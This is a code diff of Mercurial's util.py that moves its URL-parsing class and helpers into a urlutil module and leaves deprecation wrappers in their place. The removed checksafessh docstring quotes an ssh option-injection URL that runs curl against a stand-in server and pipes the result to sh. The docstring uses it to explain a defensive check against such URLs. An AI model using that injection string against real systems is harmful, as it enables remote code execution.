--- a/mercurial/util.py Sun Apr 11 23:54:35 2021 +0200
+++ b/mercurial/util.py Mon Apr 12 03:01:04 2021 +0200
@@ -28,7 +28,6 @@
import platform as pyplatform
import re as remod
import shutil
-import socket
import stat
import sys
import time
@@ -57,6 +56,7 @@
hashutil,
procutil,
stringutil,
+ urlutil,
)
if pycompat.TYPE_CHECKING:
@@ -65,7 +65,6 @@
List,
Optional,
Tuple,
- Union,
)
@@ -2959,420 +2958,52 @@
return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
-def getport(port):
- # type: (Union[bytes, int]) -> int
- """Return the port for a given network service.
-
- If port is an integer, it's returned as is. If it's a string, it's
- looked up using socket.getservbyname(). If there's no matching
- service, error.Abort is raised.
- """
- try:
- return int(port)
- except ValueError:
- pass
-
- try:
- return socket.getservbyname(pycompat.sysstr(port))
- except socket.error:
- raise error.Abort(
- _(b"no port number associated with service '%s'") % port
- )
-
-
-class url(object):
- r"""Reliable URL parser.
-
- This parses URLs and provides attributes for the following
- components:
-
- <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
-
- Missing components are set to None. The only exception is
- fragment, which is set to '' if present but empty.
-
- If parsefragment is False, fragment is included in query. If
- parsequery is False, query is included in path. If both are
- False, both fragment and query are included in path.
-
- See http://www.ietf.org/rfc/rfc2396.txt for more information.
-
- Note that for backward compatibility reasons, bundle URLs do not
- take host names. That means 'bundle://../' has a path of '../'.
-
- Examples:
-
- >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
- <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
- >>> url(b'ssh://[::1]:2200//home/joe/repo')
- <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
- >>> url(b'file:///home/joe/repo')
- <url scheme: 'file', path: '/home/joe/repo'>
- >>> url(b'file:///c:/temp/foo/')
- <url scheme: 'file', path: 'c:/temp/foo/'>
- >>> url(b'bundle:foo')
- <url scheme: 'bundle', path: 'foo'>
- >>> url(b'bundle://../foo')
- <url scheme: 'bundle', path: '../foo'>
- >>> url(br'c:\foo\bar')
- <url path: 'c:\\foo\\bar'>
- >>> url(br'\\blah\blah\blah')
- <url path: '\\\\blah\\blah\\blah'>
- >>> url(br'\\blah\blah\blah#baz')
- <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
- >>> url(br'file:///C:\users\me')
- <url scheme: 'file', path: 'C:\\users\\me'>
-
- Authentication credentials:
-
- >>> url(b'ssh://joe:xyz@x/repo')
- <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
- >>> url(b'ssh://joe@x/repo')
- <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
-
- Query strings and fragments:
-
- >>> url(b'http://host/a?b#c')
- <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
- >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
- <url scheme: 'http', host: 'host', path: 'a?b#c'>
-
- Empty path:
-
- >>> url(b'')
- <url path: ''>
- >>> url(b'#a')
- <url path: '', fragment: 'a'>
- >>> url(b'http://host/')
- <url scheme: 'http', host: 'host', path: ''>
- >>> url(b'http://host/#a')
- <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
-
- Only scheme:
-
- >>> url(b'http:')
- <url scheme: 'http'>
- """
-
- _safechars = b"!~*'()+"
- _safepchars = b"/!~*'()+:\\"
- _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
-
- def __init__(self, path, parsequery=True, parsefragment=True):
- # type: (bytes, bool, bool) -> None
- # We slowly chomp away at path until we have only the path left
- self.scheme = self.user = self.passwd = self.host = None
- self.port = self.path = self.query = self.fragment = None
- self._localpath = True
- self._hostport = b''
- self._origpath = path
-
- if parsefragment and b'#' in path:
- path, self.fragment = path.split(b'#', 1)
-
- # special case for Windows drive letters and UNC paths
- if hasdriveletter(path) or path.startswith(b'\\\\'):
- self.path = path
- return
-
- # For compatibility reasons, we can't handle bundle paths as
- # normal URLS
- if path.startswith(b'bundle:'):
- self.scheme = b'bundle'
- path = path[7:]
- if path.startswith(b'//'):
- path = path[2:]
- self.path = path
- return
-
- if self._matchscheme(path):
- parts = path.split(b':', 1)
- if parts[0]:
- self.scheme, path = parts
- self._localpath = False
-
- if not path:
- path = None
- if self._localpath:
- self.path = b''
- return
- else:
- if self._localpath:
- self.path = path
- return
-
- if parsequery and b'?' in path:
- path, self.query = path.split(b'?', 1)
- if not path:
- path = None
- if not self.query:
- self.query = None
-
- # // is required to specify a host/authority
- if path and path.startswith(b'//'):
- parts = path[2:].split(b'/', 1)
- if len(parts) > 1:
- self.host, path = parts
- else:
- self.host = parts[0]
- path = None
- if not self.host:
- self.host = None
- # path of file:///d is /d
- # path of file:///d:/ is d:/, not /d:/
- if path and not hasdriveletter(path):
- path = b'/' + path
-
- if self.host and b'@' in self.host:
- self.user, self.host = self.host.rsplit(b'@', 1)
- if b':' in self.user:
- self.user, self.passwd = self.user.split(b':', 1)
- if not self.host:
- self.host = None
-
- # Don't split on colons in IPv6 addresses without ports
- if (
- self.host
- and b':' in self.host
- and not (
- self.host.startswith(b'[') and self.host.endswith(b']')
- )
- ):
- self._hostport = self.host
- self.host, self.port = self.host.rsplit(b':', 1)
- if not self.host:
- self.host = None
-
- if (
- self.host
- and self.scheme == b'file'
- and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
- ):
- raise error.Abort(
- _(b'file:// URLs can only refer to localhost')
- )
-
- self.path = path
-
- # leave the query string escaped
- for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
- v = getattr(self, a)
- if v is not None:
- setattr(self, a, urlreq.unquote(v))
-
- def copy(self):
- u = url(b'temporary useless value')
- u.path = self.path
- u.scheme = self.scheme
- u.user = self.user
- u.passwd = self.passwd
- u.host = self.host
- u.path = self.path
- u.query = self.query
- u.fragment = self.fragment
- u._localpath = self._localpath
- u._hostport = self._hostport
- u._origpath = self._origpath
- return u
-
- @encoding.strmethod
- def __repr__(self):
- attrs = []
- for a in (
- b'scheme',
- b'user',
- b'passwd',
- b'host',
- b'port',
- b'path',
- b'query',
- b'fragment',
- ):
- v = getattr(self, a)
- if v is not None:
- attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
- return b'<url %s>' % b', '.join(attrs)
-
- def __bytes__(self):
- r"""Join the URL's components back into a URL string.
-
- Examples:
-
- >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
- 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
- 'http://user:pw@host:80/?foo=bar&baz=42'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
- 'http://user:pw@host:80/?foo=bar%3dbaz'
- >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
- 'ssh://user:pw@[::1]:2200//home/joe#'
- >>> bytes(url(b'http://localhost:80//'))
- 'http://localhost:80//'
- >>> bytes(url(b'http://localhost:80/'))
- 'http://localhost:80/'
- >>> bytes(url(b'http://localhost:80'))
- 'http://localhost:80/'
- >>> bytes(url(b'bundle:foo'))
- 'bundle:foo'
- >>> bytes(url(b'bundle://../foo'))
- 'bundle:../foo'
- >>> bytes(url(b'path'))
- 'path'
- >>> bytes(url(b'file:///tmp/foo/bar'))
- 'file:///tmp/foo/bar'
- >>> bytes(url(b'file:///c:/tmp/foo/bar'))
- 'file:///c:/tmp/foo/bar'
- >>> print(url(br'bundle:foo\bar'))
- bundle:foo\bar
- >>> print(url(br'file:///D:\data\hg'))
- file:///D:\data\hg
- """
- if self._localpath:
- s = self.path
- if self.scheme == b'bundle':
- s = b'bundle:' + s
- if self.fragment:
- s += b'#' + self.fragment
- return s
-
- s = self.scheme + b':'
- if self.user or self.passwd or self.host:
- s += b'//'
- elif self.scheme and (
- not self.path
- or self.path.startswith(b'/')
- or hasdriveletter(self.path)
- ):
- s += b'//'
- if hasdriveletter(self.path):
- s += b'/'
- if self.user:
- s += urlreq.quote(self.user, safe=self._safechars)
- if self.passwd:
- s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
- if self.user or self.passwd:
- s += b'@'
- if self.host:
- if not (self.host.startswith(b'[') and self.host.endswith(b']')):
- s += urlreq.quote(self.host)
- else:
- s += self.host
- if self.port:
- s += b':' + urlreq.quote(self.port)
- if self.host:
- s += b'/'
- if self.path:
- # TODO: similar to the query string, we should not unescape the
- # path when we store it, the path might contain '%2f' = '/',
- # which we should *not* escape.
- s += urlreq.quote(self.path, safe=self._safepchars)
- if self.query:
- # we store the query in escaped form.
- s += b'?' + self.query
- if self.fragment is not None:
- s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
- return s
-
- __str__ = encoding.strmethod(__bytes__)
-
- def authinfo(self):
- user, passwd = self.user, self.passwd
- try:
- self.user, self.passwd = None, None
- s = bytes(self)
- finally:
- self.user, self.passwd = user, passwd
- if not self.user:
- return (s, None)
- # authinfo[1] is passed to urllib2 password manager, and its
- # URIs must not contain credentials. The host is passed in the
- # URIs list because Python < 2.4.3 uses only that to search for
- # a password.
- return (s, (None, (s, self.host), self.user, self.passwd or b''))
-
- def isabs(self):
- if self.scheme and self.scheme != b'file':
- return True # remote URL
- if hasdriveletter(self.path):
- return True # absolute for our purposes - can't be joined()
- if self.path.startswith(br'\\'):
- return True # Windows UNC path
- if self.path.startswith(b'/'):
- return True # POSIX-style
- return False
-
- def localpath(self):
- # type: () -> bytes
- if self.scheme == b'file' or self.scheme == b'bundle':
- path = self.path or b'/'
- # For Windows, we need to promote hosts containing drive
- # letters to paths with drive letters.
- if hasdriveletter(self._hostport):
- path = self._hostport + b'/' + self.path
- elif (
- self.host is not None and self.path and not hasdriveletter(path)
- ):
- path = b'/' + path
- return path
- return self._origpath
-
- def islocal(self):
- '''whether localpath will return something that posixfile can open'''
- return (
- not self.scheme
- or self.scheme == b'file'
- or self.scheme == b'bundle'
- )
-
-
-def hasscheme(path):
- # type: (bytes) -> bool
- return bool(url(path).scheme) # cast to help pytype
-
-
-def hasdriveletter(path):
- # type: (bytes) -> bool
- return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
-
-
-def urllocalpath(path):
- # type: (bytes) -> bytes
- return url(path, parsequery=False, parsefragment=False).localpath()
-
-
-def checksafessh(path):
- # type: (bytes) -> None
- """check if a path / url is a potentially unsafe ssh exploit (SEC)
-
- This is a sanity check for ssh urls. ssh will parse the first item as
- an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
- Let's prevent these potentially exploited urls entirely and warn the
- user.
-
- Raises an error.Abort when the url is unsafe.
- """
- path = urlreq.unquote(path)
- if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
- raise error.Abort(
- _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
- )
-
-
-def hidepassword(u):
- # type: (bytes) -> bytes
- '''hide user credential in a url string'''
- u = url(u)
- if u.passwd:
- u.passwd = b'***'
- return bytes(u)
-
-
-def removeauth(u):
- # type: (bytes) -> bytes
- '''remove all authentication information from a url string'''
- u = url(u)
- u.user = u.passwd = None
- return bytes(u)
+def getport(*args, **kwargs):
+ msg = b'getport(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.getport(*args, **kwargs)
+
+
+def url(*args, **kwargs):
+ msg = b'url(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.url(*args, **kwargs)
+
+
+def hasscheme(*args, **kwargs):
+ msg = b'hasscheme(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hasscheme(*args, **kwargs)
+
+
+def hasdriveletter(*args, **kwargs):
+ msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hasdriveletter(*args, **kwargs)
+
+
+def urllocalpath(*args, **kwargs):
+ msg = b'urllocalpath(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.urllocalpath(*args, **kwargs)
+
+
+def checksafessh(*args, **kwargs):
+ msg = b'checksafessh(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.checksafessh(*args, **kwargs)
+
+
+def hidepassword(*args, **kwargs):
+ msg = b'hidepassword(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.hidepassword(*args, **kwargs)
+
+
+def removeauth(*args, **kwargs):
+ msg = b'removeauth(...) moved to mercurial.utils.urlutil'
+ nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.removeauth(*args, **kwargs)
timecount = unitcountfn(